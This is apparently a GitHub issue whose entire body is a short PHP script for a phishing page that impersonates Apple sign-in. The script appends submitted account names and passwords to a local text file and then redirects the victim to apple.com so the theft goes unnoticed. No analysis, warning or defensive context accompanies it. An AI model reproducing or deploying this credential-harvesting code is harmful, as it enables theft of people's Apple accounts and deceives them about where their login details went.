abysmalbivko / musical-eureka

0 stars 0 forks source link

Ghg #2

Open abysmalbivko opened 1 year ago

abysmalbivko commented 1 year ago

[<?php

file_put_contents("usernames.txt", "Account: " . $_POST['apple'] . " Pass: " . $_POST['pw'] . "\n", FILE_APPEND); header('Location: https://www.apple.com'); exit();]()